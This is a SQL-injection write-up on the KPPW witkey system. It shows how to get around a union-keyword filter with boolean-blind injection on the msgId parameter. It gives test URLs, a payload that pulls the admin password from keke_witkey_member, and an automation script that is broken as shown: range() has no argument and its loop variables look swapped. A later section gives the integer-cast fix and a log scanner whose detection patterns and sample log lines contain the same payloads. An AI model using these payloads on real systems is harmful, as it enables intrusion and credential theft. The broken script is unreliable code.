KPPW open-source witkey system protection bypass: blind injection notes
1. Kppw SQL injection
The vendor patched the earlier vulnerability by replacing the keyword union, so union-based injection no longer works.
However, blind injection is still possible.
The same kind of flaw exists at several points; the one discussed here is in the private message feature.
2. Register two accounts and send three messages from one to the other.
3. Open the URL below
http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16
and try injecting there.
The message detail page shows "previous" and "next" links; their presence is the oracle.
Injection test
http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=1 --
The page is displayed normally.
http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=2 --
The content disappears.
4. The URL mainly used
http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and (select CHAR(48))=SUBSTR((SELECT `password` from keke_witkey_member WHERE uid=1),1,1)--
A small script automates this; replace the host, URL and cookie with your own.
# coding: utf-8
import httplib

def get(i1, i2):
    # i1: ASCII code to compare against, i2: character position in the column
    page = ""
    rHtml = httplib.HTTPConnection("192.168.1.101", 80, False)
    url = ("/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1"
           "&msgId=13%20and%20%28select%20CHAR%28" + i1 + "%29%29=SUBSTR%28%28SELECT%20"
           "%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29," + i2 + ",1%29--")
    # print url
    rHtml.request("GET", url, headers={
        "User-Agent": "Firefox/22.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Cookie": "PHPSESSID=x",
        "Connection": "keep-alive",
    })
    page = rHtml.getresponse(False)
    # the count of a marker string in the response acts as the true/false oracle
    return page.read().count('barri')

mm = []
for I in range(48, 123):
    for ii in range():  # the range argument is missing in the original text
        if get(str(ii), str(I)) != 0:
            mm.append(chr(ii))
            print "".join(mm)
            break
Fix:
Cast msgId to an integer before it reaches the query.
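The following is an added example written for this note, not code from the write-up or from the KPPW project. It shows the two defensive sides of the issue above: normalize_int_param mirrors the "cast to int" fix, so the boolean-blind payloads collapse to the plain id 16, and scan_log flags requests whose integer parameters (msgId, intPage) carry non-numeric values or the and 1=1 / and 1=2 / SUBSTR / CHAR patterns used for blind injection. The log lines are constructed in common log format and are not from the page; the response sizes in them are invented to show the true/false difference the oracle relies on.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the page): one ordinary request,
# the 1=1 / 1=2 probes and the SUBSTR payload, all against msgId.
SAMPLE_LOG = """\
192.168.1.50 - - [01/Jan/2014:10:00:00 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 HTTP/1.1" 200 5120
192.168.1.50 - - [01/Jan/2014:10:00:05 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16%20and%201=1%20-- HTTP/1.1" 200 5120
192.168.1.50 - - [01/Jan/2014:10:00:06 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16%20and%201=2%20-- HTTP/1.1" 200 4870
192.168.1.50 - - [01/Jan/2014:10:00:09 +0800] "GET /KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16%20and%20(select%20CHAR(48))=SUBSTR((SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid=1),1,1)-- HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+) (?P<bytes>\d+)'
)

# Query parameters the application treats as integer ids.
INT_PARAMS = ("msgId", "intPage")

# Boolean-blind markers: "and/or <n>=<n>", "and (select", SUBSTR( or CHAR(.
BLIND_RE = re.compile(
    r"\b(and|or)\b\s*\(?\s*(\d+\s*=\s*\d+|select\b)|\bsubstr\s*\(|\bchar\s*\(",
    re.I,
)


def normalize_int_param(value):
    """Mirror of the fix: like PHP's (int) cast, keep only a leading integer,
    so '16 and 1=2 --' becomes 16 and anything non-numeric becomes 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def analyze_request(path):
    """Return findings for one request path; an empty list means it is clean."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    findings = []
    for name in INT_PARAMS:
        for raw in qs.get(name, []):
            if re.fullmatch(r"[+-]?\d+", raw):
                continue  # strict integer: exactly what the fixed code accepts
            kind = "blind_sqli" if BLIND_RE.search(raw) else "non_numeric"
            findings.append({
                "param": name,
                "value": raw,
                "kind": kind,
                "coerced": normalize_int_param(raw),  # what the fixed code would use
            })
    return findings


def scan_log(text):
    """Run analyze_request over every parsable line and attach request metadata."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for f in analyze_request(m.group("path")):
            f.update(ip=m.group("ip"), ts=m.group("ts"),
                     status=m.group("status"), bytes=int(m.group("bytes")))
            alerts.append(f)
    return alerts


def tally_by_ip(alerts):
    """Count suspicious requests per source address, a cheap first triage view."""
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["kind"], h["param"], repr(h["value"]), "->", h["coerced"])
    print(tally_by_ip(hits))
```

Two points worth noting: every request here returned status 200, so status-based alerting would miss this, which is why the detector inspects parameter values rather than response codes; and the coerced column shows that after the integer cast all three payloads reduce to msgId=16, the same row the unmodified request fetched, so the application no longer leaks anything through the previous/next links.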